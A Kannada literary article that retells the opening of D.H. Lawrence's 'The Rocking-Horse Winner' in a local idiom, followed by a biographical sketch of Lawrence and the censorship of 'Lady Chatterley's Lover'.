ಗೆಲ್ಲುವ ಕುದುರೆ

ಪ್ರಖ್ಯಾತ ಇಂಗ್ಲಿಷ್ ಲೇಖಕ ಡಿ.ಎಚ್.ಲಾರೆನ್ಸ್‍ನ ಕತೆ, ಕಾದಂಬರಿಗಳು ಆಧುನಿಕತೆಯು ಮನುಷ್ಯನ ಮೇಲೆ ತಂದು ಹಾಕಿರುವ ಒತ್ತಡ, ಯಾಂತ್ರಿಕತೆ, ಅಮಾನವೀಯ ಗುಣಗಳನ್ನು ಚರ್ಚಿಸುತ್ತವೆ. ಅವನ ಕೃತಿಗಳನ್ನು ಮನೋವೈಜ್ಞಾನಿಕ ನೆಲೆಯಲ್ಲಿ ಓದಿದಾಗ ಅವು ಹೆಚ್ಚಿನ ಅರ್ಥ ಪಡೆದುಕೊಳ್ಳುತ್ತವೆ. ಇಲ್ಲಿ ಪ್ರಕಟವಾಗಿರುವ ಅವನ ಈ ‘ಗೆಲ್ಲುವ ಕುದುರೆ’ ಕತೆ ಕೂಡ ಸಾವಧಾನದ ಓದು ಮತ್ತು ಮನೋವೈಜ್ಞಾನಿಕ ಅನುಸಂಧಾನವನ್ನು ಬಯಸುತ್ತದೆ. ತಾಯಿ ಮತ್ತು ಮಗನ ನಡುವೆ ಹೆಣೆಯಲ್ಪಟ್ಟಿರುವ ಭಾವನಾತ್ಮಕ ಸಂಬಂಧಗಳನ್ನು ಅದು ಅನಾವರಣಗೊಳಿಸುತ್ತದೆ.

ಹೆಸ್ಟರ್ ಹೆಸರಿನ ಹೆಂಗಸಿಗೆ ಅಂದ, ಚೆಂದ, ಸೊಬಗು-ಸೌಂದರ್ಯಗಳ ಜೊತೆಗ ಜೀವನಕ್ಕೆ ಬೇಕಾಗುವ ಎಲ್ಲ ಸೌಕರ್ಯಗಳೂ ಇದ್ದವು. ಆದರೆ ಅದೃಷ್ಟವೆಂಬುದೊಂದು ಮಾತ್ರ ಇರಲಿಲ್ಲ. ಪ್ರೇಮವನ್ನು ನೆಚ್ಚಿಕೊಂಡು ಅವಳು ಮದುವೆಯಾದಳು. ಆದರೆ ಆ ಪ್ರೇಮ ಮರೀಚಿಕೆಯಾಯಿತು. ಅವಳಿಗೆ ಮುದ್ದಾದ ಮಕ್ಕಳಿದ್ದರು. ಆದರೆ ಮಕ್ಕಳನ್ನು ಕಂಡರೆ ಅವಳಿಗೆ ಯಾಕೋ ತಿರಸ್ಕಾರ. ಯಾಕಾದರೂ ಈ ಮಕ್ಕಳು ತನ್ನ ಹೊಟ್ಟೆಯಲ್ಲಿ ಹುಟ್ಟಿದವೋ ಎನ್ನುವ ಉದಾಸೀನ ಭಾವ. ತನ್ನ ಸಮಸ್ಯೆಗಳೇ ಹಾಸಿ ಹೊದ್ದುಕೊಳ್ಳುವಷ್ಟಿರುವಾಗ ಈ ಮಕ್ಕಳ ರಗಳೆ ಬೇರೆ.

ತಪ್ಪು ಮಕ್ಕಳದಲ್ಲ, ತನ್ನದೇ ಎಂದು ಆಕೆಗೆ ಗೊತ್ತು. ಆದರೆ ಅದು ಏನೆಂದು ತಿಳಿಯಲಾರದು. ತನ್ನ ಮಕ್ಕಳನ್ನು ತಾನಲ್ಲದೆ ಮತ್ತ್ಯಾರು ಪ್ರೀತಿಸಬೇಕು ಎಂದು ಆಕೆ ಅನೇಕ ಸಲ ಅಂದುಕೊಂಡು ತನ್ನನ್ನು ಸರಿಪಡಿಸಿಕೊಳ್ಳಬೇಕೆನ್ನುವಳು. ಆದರೆ ಮಕ್ಕಳ ಮಧ್ಯೆ ಇದ್ದಾಗ ಅವಳ ಹೃದಯ ಮಾತ್ರ ಕಲ್ಲಾಗುವುದು. ತಮ್ಮ ತಾಯಿ ಹೀಗೇಕೆ ವರ್ತಿಸುತ್ತಾಳೆಂದು ಮಕ್ಕಳು ಕೂಡ ಚಿಂತಿಸುವರು. ಚಿಕ್ಕಮಕ್ಕಳು ತಮ್ಮ ತಾಯಿಯನ್ನು ಗೆಲುವಾಗಿಡಬೇಕೆಂದು ಹಾತೊರೆಯುವರು. ಆದರೆ ಹೊರಗಿನ ಜಗತ್ತಿಗೆ ಅವಳು ವಾತ್ಸಲ್ಯಮಯಿ ಅಮ್ಮನಂತೆಯೇ ಕಾಣುತ್ತಾಳೆ. ಕರುಳ ಕುಡಿಗಳಿಗಾಗಿ ಇಷ್ಟೊಂದು ಮಿಡಿಯುವ ತಾಯಿಯನ್ನು ತಾವು ಇದುವರೆಗೂ ಕಂಡಿಲ್ಲ ಎಂದು ಅಕ್ಕಪಕ್ಕದವರು ಅವಳನ್ನು ಅಟ್ಟಕ್ಕೇರಿಸುತ್ತಾರೆ. ಮಕ್ಕಳನ್ನು ಬಿಟ್ಟು ಈಕೆ ಕ್ಷಣಮಾತ್ರವೂ ಇರಲಾರಳು ಎಂದು ಅವರು ಭಾವಿಸಿದ್ದಾರೆ. ಆದರೆ ತನ್ನ ಮತ್ತು ಮಕ್ಕಳ ಮಧ್ಯೆ ಯಾವ ಪ್ರೀತಿ-ವಾತ್ಸಲ್ಯವೂ ಇಲ್ಲವೆಂದು ತಾಯಿಗೂ ಗೊತ್ತು, ಮಕ್ಕಳಿಗೂ ಗೊತ್ತು. ಬರಿದಾಗಿರುವ ಅವರ ಕಣ್ಣುಗಳೇ ಅದನ್ನು ವಿವರಿಸುತ್ತವೆ.

ಅವಳಿಗೆ ಮೂರು ಮಕ್ಕಳು. ಒಬ್ಬ ಹುಡುಗ, ಇಬ್ಬರು ಹುಡುಗಿಯರು. ಹುಡುಗನ ಹೆಸರು ಪಾಲ್. ಆತನಿಗೆ ಒಬ್ಬಳು ಅಕ್ಕ, ಒಬ್ಬಳು ತಂಗಿ. ಅವರಿಗೆ ಒಳ್ಳೆಯ ಮನೆ, ಆಳು-ಕಾಳು, ಸಾಮಾಜಿಕ ಗೌರವ ಎಲ್ಲ ಇದೆ. ಎಲ್ಲ ಸೌಲಭ್ಯಗಳಿದ್ದೂ ಮನೆಯಲ್ಲಿ ಏನೋ ಒಂದು ಕೊರತೆಯಿದೆ ಎಂದು ಅವರಿಗೆ ಅನಿಸುವುದು. ಗಂಡ, ಹೆಂಡತಿ ಇಬ್ಬರೂ ದುಡಿಯುತ್ತಿದ್ದಾರೆ. ಹೇಳಿಕೊಳ್ಳುವಂತಹ ಸಂಪಾದನೆ ಇಲ್ಲ. ಆದರೆ ಮನೆ ನಡೆಸಲಿಕ್ಕೆ, ಅಲ್ಲಿ-ಇಲ್ಲಿ ಹೋಗಲಿಕ್ಕೆ, ಮಕ್ಕಳನ್ನು ಶಾಲೆಗೆ ಕಳಿಸಲಿಕ್ಕೆ ಯಾವ ತೊಂದರೆಯೂ ಇಲ್ಲ. ಹಾಗೆ ನೋಡಿದರೆ ಅವರಷ್ಟು ಒಳ್ಳೆಯ ಸಂಸಾರ ತಮ್ಮ ನೆರೆಹೊರೆಯಲ್ಲಿ ಬೇರೆ ಯಾರದೂ ಇಲ್ಲವೆಂದು ಅವರು ಮೇಲ್ನೋಟಕ್ಕೆ ತಿಳಿಯಬಹುದಿತ್ತು. ಆದರೆ ತಮ್ಮ ಸಂಸಾರ ನೆಟ್ಟಗಿಲ್ಲವೆಂದೇ ಅವರು ತಿಳಿದಿದ್ದಾರೆ. ಮದುವೆಯಾಗುವಾಗ ಗಂಡನಿಗೆ ಒಳ್ಳೆಯ ಅವಕಾಶಗಳು ದೊರೆಯುವ ಸಂಭವವಿತ್ತು. ಆತ ದೊಡ್ಡ ಶ್ರೀಮಂತನಾಗಬಹುದಾದ ಯೋಗ ಕೂಡ ಇತ್ತು. ಆದರೆ ಅವುಗಳನ್ನು ಆತ ಸರಿಯಾಗಿ ಬಳಸಿಕೊಳ್ಳಲಿಲ್ಲ. ಅವೂ ಹೇಗೋ ಹೇಗೋ ಜಾರಿಹೋದವು.

ಒಮ್ಮೆ ಬಂದ ಅವಕಾಶ ಮತ್ತೊಮ್ಮೆ ಬರುವುದಿಲ್ಲ, ನೋಡಿ. ಹಣ ಗಳಿಸುವುದು ಗಂಡನ ಕೈಲಿ ಸಾಧ್ಯವಿಲ್ಲವೆಂದಾದಾಗ ಹೆಂಡತಿ ತಾನು ಗಳಿಸಿ ತೋರಿಸುತ್ತೇನೆ ಎಂದಳು. ಬಹಳಷ್ಟು ಆತ್ಮವಿಶ್ವಾಸದ ಹೆಂಗಸು ಅವಳು. ಹಲವು ಯೋಜನೆಗಳಲ್ಲಿ ತನ್ನನ್ನು ತೊಡಗಿಸಿಕೊಂಡಳು. ನಾಲ್ಕಾರು ಕೆಲಸಗಳನ್ನು ಮಾಡಿದಳು. ಆದರೆ ಅವಳ ಪರಿಶ್ರಮಗಳು ಕೂಡ ಯಾವ ಫಲವನ್ನೂ ನೀಡಲಿಲ್ಲ. ಇದರಿಂದ ಅವಳ ಹಣೆಯಲ್ಲಿನ ಚಿಂತೆಯ ಗೆರೆಗಳು ಜಾಸ್ತಿಯಾದವು. ತಾವು ಬಡವರು, ತಮ್ಮ ಬಳಿ ಸಾಕಷ್ಟು ದುಡ್ಡಿಲ್ಲ ಎನ್ನುವ ಭಾವನೆ ಮನೆಯ ಎಲ್ಲ ಸದಸ್ಯರಲ್ಲಿಯೂ ಇತ್ತು. ದಿನ ಕಳೆದಂತೆ ಖರ್ಚು ಹೆಚ್ಚುತ್ತಲೇ ಇತ್ತು. ಮಕ್ಕಳು ದೊಡ್ಡವರಾಗಿ ಶಾಲೆಗೆ ಹೋಗಹತ್ತಿದರು. ಅವರ ಫೀ, ಪುಸ್ತಕ, ವಾಹನ, ಬಟ್ಟೆ-ಬರೆ ಎಂದು ದುಡ್ಡು ನೀರಿನಂತೆ ಖರ್ಚಾಗತೊಡಗಿತು. 

ಮನೆಯಲ್ಲಿ ಈಗ ಎಲ್ಲರದೂ ಒಂದೇ ಆಸೆ- ‘ಮನೆಯಲ್ಲಿ ದುಡ್ಡು ಹೆಚ್ಚಿಗೆಯಾಗಬೇಕು.’ ಅಪ್ಪ-ಅಮ್ಮ ಇಬ್ಬರೂ ದೊಡ್ಡ ದೊಡ್ಡ ಸಾಮಾಜಿಕ ಗುಂಪುಗಳಲ್ಲಿ ತೊಡಗಿಕೊಂಡವರಾದ್ದರಿಂದ ಅವರ ವೆಚ್ಚಗಳೂ ಜಾಸ್ತಿಯಿದ್ದವು. ದುಡಿಮೆ ಕಡಿಮೆ, ಖರ್ಚು ಜಾಸ್ತಿ. ಹೆಸ್ಟರ್ ಅನೇಕ ಆಕರ್ಷಕವೆನ್ನಿಸುವ ಉದ್ಯೋಗಗಳಲ್ಲಿ ತೊಡಗಿಕೊಂಡು ತನ್ನ ಆದಾಯವನ್ನು ಹೆಚ್ಚಿಗೆ ಮಾಡಿಕೊಳ್ಳಲು ನೋಡಿದಳು. ಆದರೆ ಪ್ರಯತ್ನ ಮಾಡಿದ ಹಾಗೆಲ್ಲ ಕೈ ಸುಟ್ಟಕೊಂಡಳೇ ವಿನಾ ನಯಾಪೈಸೆಯ ಲಾಭವಾಗಲಿಲ್ಲ. ಅವಳು ಬಯಸುವಷ್ಟು ಹಣ ಯಾವುದರಿಂದಲೂ ಅವಳಿಗೆ ಸಿಗಲಿಲ್ಲ. ತನ್ನ ಗುರಿಯಲ್ಲಿ ತಾನು ಯಶಸ್ಸು ಸಾಧಿಸಿಯೇ ತೀರುತ್ತೇನೆ ಎನ್ನುವ ಎಷ್ಟೊಂದು ಛಲವಿತ್ತು ಅವಳಿಗೆ! ಬರುಬರುತ್ತ ಅವಳು ಮಂಕಾಗತೊಡಗಿದಳು.

‘ದುಡ್ಡು, ದುಡ್ಡು.’ ಯಾವ ದಿಕ್ಕಿಗೆ ತಿರುಗಿದರೂ ದುಡ್ಡು ಎನ್ನುವ ಉಚ್ಚಾರ. ‘ಈ ಮನೆಗೆ ಹೆಚ್ಚಿನ ಹಣದ ಅವಶ್ಯಕತೆ ಇದೆ’, ‘ಹೌದು, ಮನೆ ನಡೆಸುವ ಸಲುವಾಗಿ ಜಾಸ್ತಿ ದುಡ್ಡು ಬೇಕಾಗಿದೆ.’

ಕೆಲವು ದಿನಗಳಿಂದ ಮನೆಯಲ್ಲಿ ಏನೋ ಒಂಥರಾ, ಯಾರೋ ಹಿನ್ನೆಲೆಯಲ್ಲಿ, ಪಿಸುದನಿಯಲ್ಲಿ ಹೇಳುತ್ತಿದ್ದಾರೆ ಎನಿಸುವ ದನಿ ಕೇಳಿಬರತೊಡಗಿತು. ಮಕ್ಕಳು ಕಿವಿಗೊಟ್ಟು ಕೇಳಿದರೆ ಇಡೀ ಮನೆಯ ತುಂಬಾ ಪ್ರತಿಧ್ವನಿಯೊಂದು ಕೇಳಿದ ಹಾಗಾಗುತ್ತಿದೆ. ‘ದುಡ್ಡು, ದುಡ್ಡು.’ ಯಾವ ದಿಕ್ಕಿಗೆ ತಿರುಗಿದರೂ ದುಡ್ಡು ಎನ್ನುವ ಉಚ್ಚಾರ. ‘ಈ ಮನೆಗೆ ಹೆಚ್ಚಿನ ಹಣದ ಅವಶ್ಯಕತೆ ಇದೆ’, ‘ಹೌದು, ಮನೆ ನಡೆಸುವ ಸಲುವಾಗಿ ಜಾಸ್ತಿ ದುಡ್ಡು ಬೇಕಾಗಿದೆ.’ ಎನ್ನುವ ನುಡಿಗಳು ಸ್ಪಷ್ಟವಾಗಿ ಕೇಳಲ್ಪಡುತ್ತಿವೆ. ಮನೆ ತನ್ನಷ್ಟಕ್ಕೆ ತಾನು ಮಾತಾಡತೊಡಗಿತ್ತು. ಇಡೀ ಮನೆಯೇ ಕಿವಿಯೊಳಗೆ ಬಂದು ಮೆಲುದನಿಯಲ್ಲಿ ನುಡಿಯುತ್ತಿದೆ. ಮಕ್ಕಳಿಗಂತೂ ಅದು ಸ್ಪಷ್ಟವಾಗಿ ಕೇಳತೊಡಗಿತ್ತು. ಯಾರೂ ಅದರ ಬಗ್ಗೆ ಬಹಿರಂಗವಾಗಿ ಹೇಳಿಕೊಳ್ಳದಿದ್ದರೂ ಮನೆ ಮಾತ್ರ ಆ ರೀತಿ ನುಡಿಯುತ್ತಿದೆ ಎಂದು ಎಲ್ಲರಿಗೂ ತಿಳಿದುಹೋಗಿದೆ. 

ಬಹಳ ತುಟ್ಟಿಯಾದ ವಿಧವಿಧ ಆಟದ ಗೊಂಬೆಗಳು ಹಾಗೂ ಇತರ ಸಾಮಾನುಗಳು ಕ್ರಿಸ್‍ಮಸ್ ವೇಳೆಗೆ ಮನೆಯನ್ನು ತುಂಬಿಕೊಂಡಾಗ ಆ ದನಿ ಮತ್ತಷ್ಟು ಜೋರಾಯಿತು. ಮನೆಯಲ್ಲಿ ಎಲ್ಲಿ ಹೋದಲ್ಲೆಲ್ಲ ಅದೇ ಮಾತು. ಮನೆಯ ಚಿತ್ತಾಕರ್ಷಕ ಗೋಡೆಗಳು, ಕಿಟಕಿಗಳ ಪರದೆಗಳು, ಪಾಲ್‍ನ ಕೋಣೆಗೆ ಬಂದಿದ್ದ ಆಕರ್ಷಕ ಮರಗುದುರೆ- ಎಲ್ಲವುಗಳು ‘ಮನೆಗೆ ದುಡ್ಡು ಅವಶ್ಯ ಬೇಕಾಗಿದೆ’ ಎಂದು ಒಂದೇ ಸಮನೆ ಹೇಳತೊಡಗಿದವು. ಮಕ್ಕಳು ಆಡುವಾಗ ಆ ದನಿಯನ್ನು ಕೇಳಿ ಹೆದರಿದಂತಾಗಿ ಒಂದು ಕ್ಷಣ ತಮ್ಮ ಆಟವನ್ನು ನಿಲ್ಲಿಸುವರು. ಒಬ್ಬರಿಗೊಬ್ಬರು ನೋಡುವರು. ಆ ಮಾತುಗಳನ್ನು ಅವರೆಲ್ಲರೂ ಕೇಳಿದ್ದಾರೆಂದು ಅವರ ಕಣ್ಣುಗಳೇ ಹೇಳುತ್ತಿದ್ದವು. ಜೀವವಿಲ್ಲದ ಗೋಡೆ, ಗೋಡೆಯಲ್ಲಿನ ಮಾಡು, ಕಿಟಕಿ, ಬಾಗಿಲು, ಮಂಚ, ಸೋಫಾಗಳು ಮನೆಯ ಅವಶ್ಯಕತೆಗಳನ್ನು ಆಗಿಂದಾಗ ಅರಿತುಕೊಂಡು ‘ಹಣ ಬೇಕು, ಮನೆಗೆ ತ್ವರಿತವಾಗಿ ಹಣ ಬೇಕಾಗಿದೆ’ ಎಂಬ ಪದಗಳನ್ನು ನುಡಿಯತೊಡಗಿದ್ದವು.

ನಿರ್ಜೀವ ವಸ್ತುಗಳೇ ಹಣ, ಹಣ ಎಂದು ಬಾಯಿಬಿಡುತ್ತಿರುವಾಗ ಇನ್ನು ಸಜೀವ ವಸ್ತುಗಳು ಎಲ್ಲ ಆಸೆ ಪಡುತ್ತಿರಬೇಡ! ನಿಂತಲ್ಲಿಯೇ ಹಿಂದಕ್ಕೆ ಮುಂದಕ್ಕೆ ಹೋಗುವ ಗಾಳಿಯಲ್ಲಿಯ ಮರಗುದುರೆಯ ನೆಗೆತ ಕೂಡ ‘ದುಡ್ಡು ಬೇಕು, ದುಡ್ಡು ಬೇಕು’ ಎಂದು ಹೇಳುತ್ತಿದ್ದರೆ ಜೀವವಿಲ್ಲದ ಮರದ ಕುದುರೆ ಕೂಡ ಆ ದನಿಯನ್ನು ಕೇಳುತ್ತಿತ್ತು. ಪೆದ್ದುಪೆದ್ದಾಗಿ ನಗುತ್ತಿರುವ ಗೊಂಬೆ ಸಹ ದುಡ್ಡಿನ ಅವಶ್ಯಕತೆಯ ಮಾತು ಕೇಳಿಕೊಂಡು ಮತ್ತಷ್ಟು ಕಿಲಕಿಲ ಎನ್ನತೊಡಗಿತ್ತು. ಟೆಡ್ಡಿಬಿಯರ್ ಸ್ಥಾನದಲ್ಲಿ ಬಂದು ಕುಳಿತಿದ್ದ ನಾಯಿಮರಿಗೆ ‘ದುಡ್ಡು ಬೇಕು, ದುಡ್ಡು ಬೇಕು’ ಎಂದು ಒಂದೇ ಸಮನೆ ಉಸುರುತ್ತಿರುವ ಮನೆಯ ಮಾತು ಕೇಳಿ ಸಾಕಾಗಿಹೋಗಿತ್ತು. ಹಣವಿಲ್ಲದೆ ಮುಂದೆ ಹೋಗಲಾರೆ, ಹಣವೇ ಸರ್ವಸ್ವ, ಹಣ ಬೇಕು, ಹಣ ಬೇಕೇ ಬೇಕು ಎನ್ನುವ ಮನೆಯ ಈ ನಿರಂತರ ದನಿಯನ್ನು ಎಲ್ಲರೂ ಕೇಳುತ್ತಿದ್ದರೂ ಅದನ್ನು ಯಾರೂ ಬಹಿರಂಗವಾಗಿ ಹೇಳಿಕೊಳ್ಳುತ್ತಿರಲಿಲ್ಲ. ತಾವು ಉಸಿರಾಡುವುದನ್ನು ಹೇಗೆ ಹೇಳಿಕೊಳ್ಳುತ್ತಿರಲಿಲ್ಲವೋ ಹಾಗೆ ಈ ಮಾತನ್ನು ಸಹ ಯಾರೂ ಬಾಯಿಬಿಟ್ಟು ಹೇಳಲಿಲ್ಲ.

ಮುದ್ದು ಮಗ ಪಾಲ್ ಒಂದು ದಿನ ತಾಯಿಯನ್ನು ಕೇಳಿದ: ‘ಅವ್ವ, ನಾ ಏನೋ ಕೇಳಬೇಕಂತ ಮಾಡೇನಿ. ಸಿಟ್ಟಾಗಬ್ಯಾಡ. ನಾವು ಯಾವುದಾದರೂ ಮದುವೆಗೋ, ನಮ್ಮ ಸಂಬಂಧಿಕರನ್ನ ಭೆಟ್ಟಿಯಾಗಲಿಕ್ಕೋ ಹೋಗಬೇಕಾದ್ರ ಮಾಂವನ ಕಾರಿನ್ಯಾಗ ಹೋಗ್ತೇವಿ, ಇಲ್ಲಾ ಟ್ಯಾಕ್ಸಿ ಬುಕ್ ಮಾಡ್ತೇವಿ. ಮಾಂವ ಕಾರ್ ತಗೊಂಡು ಬಾಳ ದಿನಾತು. ನಾವೂ ನಮ್ಮದೇ ಆದ ಕಾರ್ ಯಾಕ ಖರೀದಿ ಮಾಡಬಾರದು?’

ಲೇಖಕ ಡಿ.ಎಚ್.ಲಾರೆನ್ಸ್ (1885-1930)

ಸೆಪ್ಟಂಬರ್ ತಿಂಗಳು ವಿವಾದಾತ್ಮಕ ಇಂಗ್ಲಿಷ್ ಲೇಖಕ ಡಿ.ಎಚ್.ಲಾರೆನ್ಸ್ ಹುಟ್ಟಿದ ತಿಂಗಳು. ಆತ ಜನಿಸಿದ್ದು ಸೆಪ್ಟಂಬರ್ 11, 1885ರಲ್ಲಿ. ಕೇವಲ ತನ್ನ 45ನೇ ವಯಸ್ಸಿನಲ್ಲಿ ಸತ್ತ ಲಾರೆನ್ಸ್ ಹೆಣ್ಣಿನ ಲೈಂಗಿಕತೆಯನ್ನು ಮುನ್ನೆಲೆಗೆ ತಂದಿದ್ದಕಾಗಿ ವಿಶ್ವ ಸಾಹಿತ್ಯಲೋಕ ಆತನನ್ನು ಆತನ ನಿಧನದ ನಂತರ ಕೊಂಡಾಡಿತು. ಆದರೆ ಆತ ಬದುಕಿರುವಾಗ ಅವನಿಗೆ ಲೋಕ ಕೊಟ್ಟ ಕಷ್ಟಗಳು ಅಷ್ಟಿಷ್ಟಲ್ಲ. ಹಲವು ವೈರಿಗಳ ಕಾಟ, ಸರ್ಕಾರದ ಸತಾವಣೆ, ಪುಸ್ತಕಗಳ ಮೇಲೆ ನಿಷೇಧ ಮತ್ತು ಅವನ ಆಶಯಗಳ ತಿರುಚುವಿಕೆಯಿಂದ ಜೀವನದುದ್ದಕ್ಕೂ ಆತ ಹಿಂಸೆ ಹಾಗೂ ಕಿರುಕಳ ಅನುಭವಿಸಬೇಕಾಯಿತು.

ಇಪ್ಪತ್ತನೇ ಶತಮಾನದ ಮೊದಲ ಭಾಗದ ಒಬ್ಬ ಇಂಗ್ಲಿಷ್ ಲೇಖಕನಾಗಿ ಡಿ.ಎಚ್.ಲಾರೆನ್ಸ್ ಪ್ರಪಂಚದ ಸಾಹಿತ್ಯಲೋಕದ ಮೇಲೆ ಮಾಡಿದ ಪ್ರಭಾವ ಬಹಳ ದೊಡ್ಡದು. “ಸನ್ಸ್ ಆ್ಯಂಡ್ ಲವರ್ಸ್”, “ದಿ ರೇನಬೋ”, “ಲೇಡಿ ಚಾಟರ್ಲಿಸ್ ಲವರ್”, “ದಿ ವೈಟ್ ಪೀಕಾಕ್”, “ವುಮೆನ್ ಇನ್ ಲವ್” ಮುಂತಾದ ಕಾದಂಬರಿಗಳು ಲಾರೆನ್ಸ್‍ನನ್ನು ವಿಶ್ವದರ್ಜೆಯ ಒಬ್ಬ ಶ್ರೇಷ್ಠ ಕಾದಂಬರಿಕಾರನನ್ನಾಗಿ ಮಾಡಿವೆ. ಲಾರೆನ್ಸ್ ಇಂದು ಒಬ್ಬ ಪ್ರಸಿದ್ಧ ಲೇಖಕನಾಗಿರಬಹುದು. ಅವನ ಕತೆ-ಕಾದಂಬರಿಗಳ ಲಕ್ಷಗಟ್ಟಲೆ ಪ್ರತಿಗಳು ಖರ್ಚಾಗುತ್ತಿರಬಹುದು. ಆದರೆ ಅವನ ಜೀವಿತ ಕಾಲಕ್ಕೆ ಈ ಲೇಖಕ ಹಲವಾರು ತೊಂದರೆಗಳನ್ನು ಅನುಭವಿಸಬೇಕಾಗಿ ಬಂತು. ಅವನ ಕಾದಂಬರಿಗಳ ಮೇಲೆ ಸರ್ಕಾರಗಳು ನಿಷೇಧ ಹೇರಿದವು. ಪ್ರಿಂಟಾದ ಪ್ರತಿಗಳನ್ನು ಸುಟ್ಟು ಹಾಕಲಾಯಿತು.

ಅವನ ಕೃತಿಗಳ ಬಗ್ಗೆ ಹಲವರು ಕಟು ಟೀಕೆಗಳನ್ನು ಮಾಡಿದರು. ಜನವಿರೋಧವನ್ನು ಆತ ಎದುರಿಸಬೇಕಾಗಿ ಬಂತು. ಆತನ ಬರಹಗಳು ಅಶ್ಲೀಲತೆಯಿಂದ ಕೂಡಿವೆ, ಸೆಕ್ಸ್‍ನ್ನು ರಂಜನೀಯವಾಗಿ ಬರೆಯುತ್ತಾನೆ ಎಂಬೆಲ್ಲ ಅಭಿಪ್ರಾಯಗಳಿಂದ ಈ ಲೇಖಕನನ್ನು ತುಳಿಯಲು ಯತ್ನಿಸಲಾಯಿತು. ತನ್ನ ಮೇಲಿನ ಆಪಾದನೆ, ತನ್ನ ಕೃತಿಗಳ ಮೇಲೆ ಹೇರಲ್ಪಟ್ಟ ನಿಷೇಧ, ವೈಯಕ್ತಿಕ ಸೋಲು ಮುಂತಾದ ಕಾರಣಗಳಿಂದ ಆತ ಒಂದೇ ಕಡೆ ನೆಲೆ ನಿಲ್ಲಲಾಗಲಿಲ್ಲ. ಸ್ವಂತ ಆಯ್ಕೆಯ ಮೇಲೆ ತಾನು ದೇಶಭ್ರಷ್ಟನಾದೆ ಎಂದು ಲಾರೆನ್ಸ್ ಹೇಳಿಕೊಂಡಿದ್ದಾನೆ.

ಕಲ್ಲಿದ್ದಲು ಗಣಿಯ ಪ್ರದೇಶವಾದ ಇಂಗ್ಲಂಡ್‍ನ ನಾಟಿಂಗಹ್ಯಾಮ್ ಪ್ರದೇಶದ ಈಸ್ಟ್‍ವುಡ್ ಎಂಬಲ್ಲಿ ಬ್ರಿನ್ಸಲೇ ಕಾಲರಿ ಮತ್ತು ಲಿಡಿಯಾ ಬರ್ಡ್‍ಸಾಲ್ ಎಂಬ ದಂಪತಿಗಳ ನಾಲ್ಕನೇ ಮಗುವಾಗಿ ಹುಟ್ಟಿದ ಲಾರೆನ್ಸ್ ದುಡಿಯುವ ವರ್ಗಗಳ ಕಷ್ಟಗಳನ್ನು ಬಾಲ್ಯದಿಂದಲೇ ನೋಡುವಂತಾಯಿತು. ಕಾರ್ಮಿಕ ಜನರ ನೋವು-ನಲಿವು ಮತ್ತು ತನ್ನ ತಂದೆ-ತಾಯಿಯ ನಡುವಿನ ಮನಸ್ತಾಪಗಳು ಆತನ ಬರಹಕ್ಕೆ ಪರೋಕ್ಷವಾಗಿ ಪ್ರೇರಣೆ ಕೊಟ್ಟವು ಎಂದು ನಂಬಲಾಗಿದೆ. ಹಳ್ಳಿಗಾಡು, ಗುಡ್ಡ-ಬೆಟ್ಟ, ಹಳ್ಳ-ಕೊಳ್ಳ ಮುಂತಾದ ಪ್ರಕೃತಿಸಹಜ ಸಂಗತಿಗಳನ್ನು ಬಹುವಾಗಿ ಮೆಚ್ಚಿಕೊಳ್ಳುತ್ತಿದ್ದ ಲಾರೆನ್ಸ್ ಇಂಗ್ಲಂಡ್‍ನ ಹಳ್ಳಿಗಾಡು ತನ್ನ ಹೃದಯಕ್ಕೆ ಹತ್ತಿರವಾಗಿತ್ತು ಎಂದಿದ್ದಾನೆ.

“ಲೇಡಿ ಚಾಟರ್ಲಿಸ್ ಲವರ್” ಲಾರೆನ್ಸ್‍ನ ಬಹುಚರ್ಚಿತ ಕೃತಿ. ಅದು ಮೊದಲು ಇಟಲಿ, ಫ್ರಾನ್ಸ್ ಮತ್ತು ಆಸ್ಟ್ರೇಲಿಯಾಗಳಲ್ಲಿ 1928 ಹಾಗೂ 1929 ರಲ್ಲಿ ಪ್ರಕಟವಾಯಿತು. ಆದರೆ ಈ ಕಾದಂಬರಿಯು ಕಾಮವನ್ನು ವೈಭವಿಕರಿಸುತ್ತದೆ ಎಂದು ಇಂಗ್ಲಂಡ್, ಅಮೇರಿಕಾ, ಕೆನಡಾ, ಭಾರತ ಮತ್ತು ಜಪಾನ್ ದೇಶಗಳು ಪ್ರಕಟನೆ ಮತ್ತು ಪ್ರಸಾರಕ್ಕೆ ನಿಷೇಧ ಹೇರಿದವು. ಪ್ರಸಿದ್ಧ ಪ್ರಕಾಶನ ಸಂಸ್ಥೆ “ಪೆಂಗ್ವಿನ್ ಬುಕ್ಸ್” ವಾದ ಮಂಡಿಸಿ ಲಾರೆನ್ಸ್‍ನ ಕಾದಂಬರಿ ಸೃಜನಶೀಲ ಕೃತಿಯೇ ಹೊರತು ಅಶ್ಲೀಲವಲ್ಲ ಎಂದು ವಾದಿಸಿತು. ಬ್ರಿಟನ್‍ನ “ಅಶ್ಲೀಲ ಪ್ರಕಾಶನ ಕಾಯಿದೆ, 1959” ರ ಕಾಯ್ದೆ ಅಡಿಯಲ್ಲಿ ಈ ಪುಸ್ತಕವನ್ನು ವಿಚಾರಣೆಗೆ ಒಳಪಡಿಸಲಾಯಿತು. ಆ ವೇಳೆಗಾಗಲೇ ಆ ಪುಸ್ತಕದ ಸಂಗ್ರಹ ಭಾಗಗಳು ಹಲವು ದೇಶಗಳಲ್ಲಿ ಪ್ರಕಟವಾಗಿದ್ದವು. ಈ.ಎಮ್.ಫಾಸ್ಟರ್, ಹೆಲೆನ್ ಗಾರ್ಡನರ್, ರೇಮಂಡ್ ವಿಲಿಯಮ್ಸ್ ಮುಂತಾದ ಸಾಹಿತ್ಯ ಲೋಕದ ದಿಗ್ಗಜರು ಈ ವಿಚಾರಣೆಗೆ ಸಾಕ್ಷಿಗಳಾಗಿ ಹಾಜರಾಗಿ ‘ಲೇಡಿ ಚಾಟರ್ಲಿಸ್ ಲವರ್’ ಕೃತಿ ನೈತಿಕ ನೆಲೆಗಟ್ಟಿನ ಆಧಾರದ ಮೇಲೆಯೇ ರಚಿಸಿದ್ದಾಗಿದ್ದು, ಅದು ಒಂದು ಸೃಜನಾತ್ಮಕ ಕೃತಿಯಾಗಿದೆ ಎಂದು ವಾದಿಸಿದರು. ಸಾರ್ವಜನಿಕರು ಈ ವಿಚಾರಣೆಯ ಬಗ್ಗೆ ಕುತೂಹಲ ಇಟ್ಟುಕೊಂಡು ತೀರ್ಪು ಏನಾಗುವುದೋ ಎಂದು ದಿನಾಲೂ ಪತ್ರಿಕೆಗಳಿಗಾಗಿ ಕಾಯುತ್ತಿದ್ದರು.

